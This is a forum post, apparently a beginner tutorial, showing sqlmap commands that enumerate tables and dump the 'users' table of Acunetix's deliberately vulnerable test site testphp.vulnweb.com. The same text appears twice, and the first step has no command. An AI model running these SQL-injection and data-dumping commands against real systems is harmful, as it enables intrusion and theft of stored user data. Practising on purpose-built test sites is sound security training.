Culls
Amusement Engineer
2
MONTHS
2 2 MONTHS OF SERVICE
LEVEL 1
300 XP
You can see part 1 here :
or this tutorial I will use official Acunetix vuln page --> testphp.vulnweb.com.
[1] List information about the existing databases
[2] List information about Tables
Write this command: sqlmap -u "testphp.vulnweb.com/artists.php?artist=1" -D acuart --tables
[3] Dump the data from the columns
For dumping data we need to use this command:
sqlmap -u "testphp.vulnweb.com/artists.php?artist=1" -D acuart --tables -T users --dump
where -C can be used to specify multiple column name separated by a comma, and the –dump query retrieves the data
or this tutorial I will use official Acunetix vuln page --> testphp.vulnweb.com.
[1] List information about the existing databases
[2] List information about Tables
Write this command: sqlmap -u "testphp.vulnweb.com/artists.php?artist=1" -D acuart --tables
[3] Dump the data from the columns
For dumping data we need to use this command:
sqlmap -u "testphp.vulnweb.com/artists.php?artist=1" -D acuart --tables -T users --dump
where -C can be used to specify multiple column name separated by a comma, and the –dump query retrieves the data